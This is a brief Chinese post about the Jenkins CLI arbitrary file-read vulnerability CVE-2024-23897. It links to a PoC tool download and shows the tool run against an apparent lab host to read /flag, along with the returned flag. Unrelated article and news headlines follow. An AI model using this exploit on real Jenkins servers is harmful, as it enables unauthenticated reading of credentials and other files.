当前位置: 首页 > news >正文

CVE-2024-23897-Jenkins 2.441之前版本存在任意文件读取漏洞

news 来源:原创 2025/4/25 5:25:04

1.漏洞介绍

Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中'@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。

2.poc利用

下载地址:

https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip

CVE-2024-23897.exe -u http://39.106.48.123:34583/ -a /flag

flag{d2545f14-3361-4c73-83ce-c7a16cfadf1c}

相关文章:

  • GLM-4V:多模态大模型在图像识别领域的突破性实践
  • 如何解析商品详情页面
  • Spark-streaming核心编程
  • 甘特图Vue3 | 原生绘制
  • leetcode 69和367
  • 构造函数体赋值和初始化列表
  • 面试题:在1亿个数据中取前10个最大的数据(Java实现)
  • 【数据结构】Map与Set结构详解
  • 开源交易所源码,交易所开发
  • 时序数据库IoTDB构建的能源电力解决方案
  • 无人设备遥控之调度自动化技术篇
  • 从岗位依附到能力生态:AI革命下“什么叫就业”的重构与价值
  • Python3(8) 字符串
  • 使用HYPRE库并行装配IJ稀疏矩阵指南: 矩阵预分配和重复利用
  • 数据集-目标检测系列- F35 战斗机 检测数据集 F35 plane >> DataBall
  • 数据分析之技术干货业务价值​​ powerquery 分组排序后取TOP
  • Code Splitting 分包策略
  • 【网络原理】从零开始深入理解TCP的各项特性和机制.(一)
  • 立錡科技优化 HDD、LPDDR、SoC 供电的高性能降压转换器
  • Python实现技能记录系统
  • 预热苏杯,“谁羽争锋”全国新闻界羽毛球团体邀请赛厦门开赛
  • 最高法:“盗链”属于信息网络传播行为,构成侵犯著作权罪
  • 印尼塔劳群岛发生6.2级地震,震源深度140千米
  • ESG领跑者|每一步都向前,李宁要让可持续发展成为可持续之事
  • 国家疾控局局长沈洪兵:将逐步缩小国内免疫规划与国际差距
  • 泽连斯基:乌英法美将在伦敦讨论停火事宜